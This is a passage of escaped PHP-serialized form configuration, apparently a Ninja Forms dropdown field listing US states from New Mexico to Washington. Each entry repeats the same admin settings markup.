dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 